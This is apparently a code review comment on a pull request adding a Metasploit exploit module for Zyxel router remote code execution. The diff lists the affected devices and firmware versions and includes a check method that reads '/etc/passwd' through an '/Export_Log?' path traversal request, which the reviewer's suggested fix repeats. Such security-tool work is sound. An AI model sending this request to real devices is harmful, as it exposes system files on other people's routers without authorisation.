modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb

```diff
@@ -0,0 +1,240 @@
+          [ 'VMG3927-B50A <= V5.17(ABMT.6)C0', {} ],
+          [ 'VMG3927-B60A <= V5.17(ABMT.6)C0', {} ],
+          [ 'VMG3927-T50K <= V5.50(ABOM.7)C0', {} ],
+          [ 'VMG4005-B50A <= V5.15(ABQA.2)C0', {} ],
+          [ 'VMG8623-T50B <= V5.50(ABPM.6)C0', {} ],
+          [ 'VMG8825-B50A <= V5.17(ABMT.6)C0', {} ],
+          [ 'VMG8825-B50B <= V5.17(ABNY.7)C0', {} ],
+          [ 'VMG8825-B60A <= V5.17(ABMT.6)C0', {} ],
+          [ 'VMG8825-B60B <= V5.17(ABNY.7)C0', {} ],
+          [ 'VMG8825-T50K <= V5.50(ABOM.7)C0', {} ],
+          [ 'XMG3927-B50A <= V5.17(ABMT.6)C0', {} ],
+          [ 'XMG8825-B50A <= V5.17(ABMT.6)C0 ', {} ],
+          [ 'VPN2S <= V1.20(ABLN.2)_00210319C1', {} ],
+          [ 'AX7501-B0 <= V5.17(ABPC.1)C0', {} ],
+          [ 'EP240P <= V5.40(ABVH.1)C0', {} ],
+          [ 'PMG5317-T20B <= V5.40(ABKI.4)C0', {} ],
+          [ 'PMG5617GA <= V5.40(ABNA.2)C0', {} ],
+          [ 'PMG5622GA <= V5.40(ABNB.2)C0', {} ],
+          [ 'WX3100-T0 <= V5.50(ABVL.1)C0', {} ],
+          [ 'WX3401-B0 <= V5.17(ABVE.1)C0', {} ],
+          [ 'WSQ50 (Multy X) <= V2.20(ABKJ.7)C0', {} ],
+          [ 'WSQ60 (Multy Plus) <= V2.20(ABND.8)C0', {} ],
+          [ 'AMG1302-T11C <= EOL', {} ],
+          [ 'VMG3925-B10C <= EOL', {} ],
+          [ 'VMG8924-B10D <= EOL', {} ],
+          [ 'VMG1312-B10D <= EOL', {} ],
+          [ 'VMG3312-T20A <= EOL', {} ],
+          [ 'VMG3625-T20A <= EOL', {} ],
+          [ 'VMG3925-B10B <= EOL', {} ],
+          [ 'VMG3925-B10C <= EOL', {} ],
+          [ 'VMG3925-B30C <= EOL', {} ],
+          [ 'VMG3926-B10A <= EOL', {} ],
+          [ 'VMG5313-B10B <= EOL', {} ],
+          [ 'VMG5313-B30B <= EOL', {} ],
+          [ 'VMG8623-T50A <= EOL', {} ],
+          [ 'VMG8823-B10B <= EOL', {} ],
+          [ 'VMG8823-B30B <= EOL', {} ],
+          [ 'VMG8823-B50B <= EOL', {} ],
+          [ 'VMG8823-B60B <= EOL', {} ],
+          [ 'VMG8924-B10D <= EOL', {} ],
+          [ 'VMG8924-B30D <= EOL', {} ],
+          [ 'PMG5317-T20A <= EOL', {} ],
+        ],
+        'DisclosureDate' => '2022-02-01',
+        'DefaultTarget' => 40,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80)
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 7200])
+      ]
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => '/Export_Log?/etc/passwd',
+        'method' => 'GET',
+        'rport' => datastore['RPORT']
+      })
+      if res && res.to_s['root:x:0:0:']
+        return Exploit::CheckCode::Vulnerable
+      else
+        return Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      pass
+    end
+    return Exploit::CheckCode::Unknown
```

Comment:
It looks like the `Rex::ConnectionError` exceptions are already handled by `send_request_raw` (called by `send_request_cgi`) and it simply returns `nil`. I believe this exception handler can be removed, since it should never be reached.

https://github.com/rapid7/metasploit-framework/blob/cb682973f7701a276476af7ced304bc9ce7c8fc8/lib/msf/core/exploit/remote/http_client.rb#L406-L408

Also, if `res` is `nil`, the Checkcode should be `Exploit::CheckCode::Unknown` instead of `Exploit::CheckCode::Safe`.

Here is a suggestion for this:
```suggestion
    res = send_request_cgi({
      'uri' => '/Export_Log?/etc/passwd',
      'method' => 'GET',
      'rport' => datastore['RPORT']
    })
    
    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return CheckCode::Vulnerable if res.to_s['root:x:0:0:']

    return CheckCode::Safe
```